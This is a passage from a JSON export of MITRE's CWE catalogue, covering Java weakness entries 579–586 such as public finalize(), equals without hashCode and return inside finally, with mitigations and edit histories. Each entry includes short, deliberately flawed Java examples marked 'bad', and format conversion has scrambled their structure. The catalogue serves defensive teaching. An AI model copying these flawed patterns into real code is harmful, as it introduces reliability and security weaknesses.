versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"579":{"attr":{"@_ID":"579","@_Name":"J2EE Bad Practices: Non-serializable Object Stored in Session","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores a non-serializable object as an HttpSession attribute, which can hurt reliability.","Extended_Description":"A J2EE application can make use of multiple JVMs in order to improve application reliability and performance. In order to make the multiple JVMs appear as a single application to the end user, the J2EE container can replicate an HttpSession object across multiple JVMs so that if one JVM becomes unavailable another can step in and take its place without disrupting the flow of the application. This is only possible if all session data is serializable, allowing the session to be duplicated between the JVMs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In order for session replication to work, the values the application stores as attributes in the session must implement the Serializable interface."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following class adds itself to the session, but because it is not serializable, the session can no longer be replicated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DataGlob {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String globName;String globValue;public void addToSession(HttpSession session) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"session.setAttribute(\\"glob\\", this);","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"580":{"attr":{"@_ID":"580","@_Name":"clone() Method Without super.clone()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a clone() method that does not call super.clone() to obtain the new object.","Extended_Description":"All implementations of clone() should obtain the new object by calling super.clone(). If a class does not follow this convention, a subclass\'s clone() method will return an object of the wrong type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call super.clone() within your clone() method, when obtaining a new object."},{"Phase":"Implementation","Description":"In some cases, you can eliminate the clone method altogether and use copy constructors."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following two classes demonstrate a bug introduced by not calling super.clone(). Because of the way Kibitzer implements clone(), FancyKibitzer\'s clone method will return an object of type Kibitzer instead of FancyKibitzer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Kibitzer {}public class FancyKibitzer extends Kibitzer{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new Kibitzer();...","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = super.clone();...","xhtml:br":["",""]}}}}],"xhtml:br":["",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Clone Method","attr":{"@_Date":"2008-04-11"}}}},"581":{"attr":{"@_ID":"581","@_Name":"Object Model Violation: Just One of Equals and Hashcode Defined","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain equal hashcodes for equal objects.","Extended_Description":"Java objects are expected to obey a number of invariants related to equality. One of these invariants is that equal objects must have equal hashcodes. In other words, if a.equals(b) == true then a.hashCode() == b.hashCode().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":"Other","Note":"If this invariant is not upheld, it is likely to cause trouble if objects of this class are stored in a collection. If the objects of the class in question are used as a key in a Hashtable or if they are inserted into a Map or Set, it is critical that equal objects have equal hashcodes."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Both Equals() and Hashcode() should be defined."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET09-J","Entry_Name":"Classes that define an equals() method must also define a hashCode() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Object Model Violation: Just One of Equals and Haschode Defined","attr":{"@_Date":"2008-01-30"}}}},"582":{"attr":{"@_ID":"582","@_Name":"Array Declared Public, Final, and Static","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program declares an array public, final, and static, which is not sufficient to prevent the array\'s contents from being modified.","Extended_Description":"Because arrays are mutable objects, the final constraint requires that the array object itself be assigned only once, but makes no guarantees about the values of the array elements. Since the array is public, a malicious program can change the values stored in the array. As such, in most cases an array declared public, final and static is a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In most situations the array should be made private."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares an array public, final and static.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public final static URL[] urls;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":28,"Entry_Name":"Unexpected Access Points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Mobile Code: Unsafe Array Declaration","attr":{"@_Date":"2008-04-11"}}}},"583":{"attr":{"@_ID":"583","@_Name":"finalize() Method Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program violates secure coding principles for mobile code by declaring a finalize() method public.","Extended_Description":"A program should never call finalize explicitly, except to call super.finalize() inside an implementation of finalize(). In mobile code situations, the otherwise error prone practice of manual garbage collection can become a security threat if an attacker can maliciously invoke a finalize() method because it is declared with public access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you are using finalize() as it was designed, there is no reason to declare finalize() with anything other than protected access."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares a public finalize() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public void finalize() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Public Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"584":{"attr":{"@_ID":"584","@_Name":"Return Inside Finally Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use a return statement inside the finally block. The finally block should have \\"cleanup\\" code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code excerpt, the IllegalArgumentException will never be delivered to the caller. The finally block will cause the exception to be discarded.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}finally {}","xhtml:div":[{"#text":"...throw IllegalArgumentException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return r;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"585":{"attr":{"@_ID":"585","@_Name":"Empty Synchronized Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an empty synchronized block.","Extended_Description":"An empty synchronized block does not actually accomplish any synchronization and may indicate a troubled section of code. An empty synchronized block can occur because code no longer needed within the synchronized block is commented out without removing the synchronized block.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"An empty synchronized block will wait until nobody else is using the synchronizer being specified. While this may be part of the desired behavior, because you haven\'t protected the subsequent code by placing it inside the synchronized block, nothing is stopping somebody else from modifying whatever it was you were waiting for while you run the subsequent code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When you come across an empty synchronized statement, or a synchronized statement in which the code has been commented out, try to determine what the original intentions were and whether or not the synchronized block is still necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to synchronize on an object, but does not execute anything in the synchronized block. This does not actually accomplish anything and may be a sign that a programmer is wrestling with synchronization but has not yet achieved the result they intend.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"synchronized(this) { }"},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public void setID(int ID){}","xhtml:div":{"#text":"synchronized(this){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.ID = ID;","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"Instead, in a correct usage, the synchronized statement should contain procedures that access or modify data that is exposed to multiple threads. For example, consider a scenario in which several threads are accessing student records at the same time. The method which sets the student ID to a new value will need to make sure that nobody else is accessing this data at the same time and will require synchronization."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-478"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"586":{"attr":{"@_ID":"586","@_Name":"Explicit Call to Finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes an explicit call to the finalize() method from outside the finalizer.","Extended_Description":"While the Java Language Specification allows an object\'s finalize() method to be called from outside the finalizer, doing so is usually a bad idea. For example, calling finalize() explicitly means that finalize() will be called more than once: the first time will be the explicit call and the last time will be the call that is made after the object is garbage collected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Testing"],"Description":"Do not make explicit calls to finalize(). Use static analysis tools to spot such instances."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code fragment calls finalize() explicitly:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"widget.finalize();","xhtml:br":["",""],"xhtml:i":"// time to clean up"}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Name, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 